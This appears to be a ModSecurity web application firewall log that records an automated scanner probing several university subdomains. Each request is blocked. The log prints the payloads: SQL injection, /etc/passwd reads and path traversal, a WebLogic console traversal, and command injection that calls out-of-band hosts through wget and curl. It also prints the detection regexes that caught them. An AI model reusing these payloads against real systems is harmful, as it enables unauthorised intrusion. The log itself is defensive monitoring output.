[Tue Aug 29 11:31:05.743835 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "journal.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQSWJMAAAA0"]
[Tue Aug 29 11:31:05.746017 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "ft.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQR42sAAAAz"]
[Tue Aug 29 11:31:05.919487 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "www.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQKOZgAAAAs"]
[Tue Aug 29 11:31:05.963153 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10icCo-f0AAAP@MwMAAAAZ"]
[Tue Aug 29 11:31:06.317673 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAP-LNIAAAAe"]
[Tue Aug 29 11:31:06.330817 2023] [:error] [pid 1031] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQHAj4AAAAp"]
[Tue Aug 29 11:31:06.334818 2023] [:error] [pid 900] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAOE1kcAAAAC"]
[Tue Aug 29 11:31:06.362279 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQKOZoAAAAs"]
[Tue Aug 29 11:31:06.367117 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQSWJUAAAA0"]
[Tue Aug 29 11:31:06.387690 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQP64IAAAAx"]
[Tue Aug 29 11:31:06.389716 2023] [:error] [pid 1038] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQOvzEAAAAw"]
[Tue Aug 29 11:31:06.391229 2023] [:error] [pid 1031] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQHAj8AAAAp"]
[Tue Aug 29 11:31:06.391912 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQQyicAAAAy"]
[Tue Aug 29 11:31:06.392333 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQDFRUAAAAl"]
[Tue Aug 29 11:31:06.394631 2023] [:error] [pid 1032] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQIS6sAAAAq"]
[Tue Aug 29 11:31:07.312413 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgk3owdug9w317w.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAP-LNMAAAAe"]
[Tue Aug 29 11:31:07.360202 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlgku4843ywmi7hd.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQEGFkAAAAm"]
[Tue Aug 29 11:31:08.302757 2023] [:error] [pid 1035] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQLC@4AAAAt"]
[Tue Aug 29 11:31:08.307181 2023] [:error] [pid 1029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQFcPkAAAAn"]
[Tue Aug 29 11:31:08.307964 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQP64cAAAAx"]
[Tue Aug 29 11:31:08.313406 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQSWJoAAAA0"]
[Tue Aug 29 11:31:08.313519 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAP@MwkAAAAZ"]
[Tue Aug 29 11:31:08.350637 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQR43AAAAAz"]
[Tue Aug 29 11:31:09.091039 2023] [:error] [pid 1039] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgzwttt8khm8p13.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAQP64gAAAAx"]
[Tue Aug 29 11:31:09.092473 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgahxbhgtupk78k.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAPLwDcAAAAX"]
[Tue Aug 29 11:31:09.098592 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgrmhwrue45cs8r.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAP8GyIAAAAV"]
[Tue Aug 29 11:31:09.099008 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg3p643as4zi6px.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAO88AQAAAAF"]
[Tue Aug 29 11:31:09.103859 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg4814sy15zr8d5.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAPMmGYAAAAY"]
[Tue Aug 29 11:31:09.317393 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlgnr87c3nuqbpjq.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAP8GyMAAAAV"]
[Tue Aug 29 11:31:10.331840 2023] [:error] [pid 977] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgconk6611i9fsq.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAPRNfYAAAAf"]
[Tue Aug 29 11:31:10.332682 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgpcp6cgy6fhorp.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQSWJ0AAAA0"]
[Tue Aug 29 11:31:10.334830 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlg38938py98d3sb.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAAQR43IAAAAz"]
